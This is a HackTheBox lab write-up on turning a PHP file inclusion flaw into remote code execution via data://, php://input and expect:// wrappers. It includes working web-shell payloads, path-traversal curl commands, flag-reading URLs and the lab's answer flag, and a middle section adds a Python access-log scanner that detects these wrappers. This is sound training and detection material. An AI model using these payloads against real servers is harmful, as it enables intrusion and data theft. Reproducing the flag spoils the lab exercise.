HackTheBox — File Inclusion: PHP wrappers for Remote Code Execution
Data
- Data wrappers can be used to include external data, including PHP code.
- The application must have allow_url_include enabled in its config file, which is located in /etc/php/X.Y/apache2/php.ini (Apache) or /etc/php/X.Y/fpm/php.ini (Nginx), where X.Y is the PHP version.
- Use php://filter to check the config file:
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
- Once we find allow_url_include enabled, we can proceed to include external PHP code in the application. The code to include is:
<?php system($_GET["cmd"]); ?>
(Note we need to base64-encode the code first, and then URL-encode the result so that the + and = characters of the base64 string survive in the query string.)
echo '<?php system($_GET["cmd"]); ?>' | base64
http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
- The text/plain;base64 prefix tells the wrapper that the data is a base64-encoded string, so the application decodes it before including it as PHP code.
Input
- The input wrapper is similar to the data wrapper in that it lets us include external resources. The only difference is that the input wrapper must be used with a POST request, with the PHP code sent in the request body:
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
- The input wrapper is usually used when an application does not accept GET requests. If that is the case, we need to modify the above command, as system($_GET["cmd"]) will not work without a GET parameter. Instead, we hardcode the command in the payload:
<?php system('id'); ?>
Expect
- The expect wrapper lets us run commands directly via the URL stream, without first creating a web shell as with the other two wrappers.
- The expect extension must be installed and enabled in the application. We can check this the same way we identified the data wrapper, except that now we grep the decoded config file for expect:
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect
extension=expect
- Using expect to execute commands on the application:
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
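As an added example that is not part of the original post, here is the defender's side of the three wrappers described above: a Python script that scans Apache-style access-log lines for query values beginning with data:, php://input, php://filter or expect:, and recovers the PHP source a data: payload would have included. The log lines, client addresses and timestamps are constructed samples; the data: payload is the post's own base64 string.

```python
import base64
import re
from urllib.parse import unquote
# Wrapper prefixes covered in the post, lowercase; checked against every decoded query value.
WRAPPER_PREFIXES = ("data:", "php://input", "php://filter", "expect:")
# Apache/Nginx combined log format; only client, method, target and status are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample lines, not real traffic. The data: value is the post's base64 of
# '<?php system($_GET["cmd"]); ?>' with '+' and '=' percent-encoded as %2B and %3D.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?language=es.php HTTP/1.1" 200 1043',
    '10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini HTTP/1.1" 200 81211',
    '10.0.0.9 - - [10/Oct/2023:13:57:12 +0000] "GET /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:58:40 +0000] "POST /index.php?language=php://input&cmd=id HTTP/1.1" 200 498',
    '10.0.0.9 - - [10/Oct/2023:13:59:02 +0000] "GET /index.php?language=expect://id HTTP/1.1" 200 33',
]
def decode_value(raw):
    # unquote, not unquote_plus: the payload's '+' must survive. Decoding twice catches double-encoded probes.
    return unquote(unquote(raw)).strip()
def classify(raw):
    """Return the wrapper prefix a decoded value starts with, or None."""
    low = decode_value(raw).lower()
    return next((p for p in WRAPPER_PREFIXES if low.startswith(p)), None)
def recover_data_payload(raw):
    """For data:...;base64,<b64> values, return the PHP source that would have been included."""
    decoded = decode_value(raw)
    if not decoded.lower().startswith("data:") or ";base64," not in decoded:
        return None
    try:
        return base64.b64decode(decoded.split(";base64,", 1)[1]).decode("utf-8", "replace")
    except ValueError:  # binascii.Error subclasses ValueError: truncated or corrupt base64
        return None
def scan_log(lines):
    """One finding per query parameter whose value starts with a PHP wrapper."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        query = m.group("target").partition("?")[2]
        for pair in filter(None, query.split("&")):
            name, _, raw = pair.partition("=")
            scheme = classify(raw)
            if scheme:  # php://input code travels in the POST body, which the access log never records
                findings.append({"ip": m.group("ip"), "method": m.group("method"), "status": m.group("status"),
                                 "param": name, "scheme": scheme, "payload": recover_data_payload(raw)})
    return findings
```

Feeding a real access log through scan_log(open(path)) gives the same findings per line; a recovered payload tells the responder exactly which PHP source was included, while a php://input hit only shows that the body needs to be pulled from a request-body capture or WAF log.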
Answer the question
Try to gain RCE using one of the PHP wrappers and read the flag at /
- First, we check if Data & Expect wrappers are enabled on the application
curl "http://83.136.253.251:30919/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"
- We see that both the expect extension and allow_url_include are enabled.
- Use either one to get the flag. I’ll use the data wrapper.
# Running "ls /" command
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=ls%20/
# Display content of the flag
http://83.136.253.251:30919/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=cat%20/37809e2f8952f06139011994726d9ef1.txt
Answer: HTB{d!$46l3_r3m0t3_url_!nclud3}
Conclusion
- These are the most common PHP wrappers used in Local File Inclusion attacks, some of which also lead to Remote Code Execution.
- Please clap if you like this post. And don’t forget to follow me for more Cybersecurity content.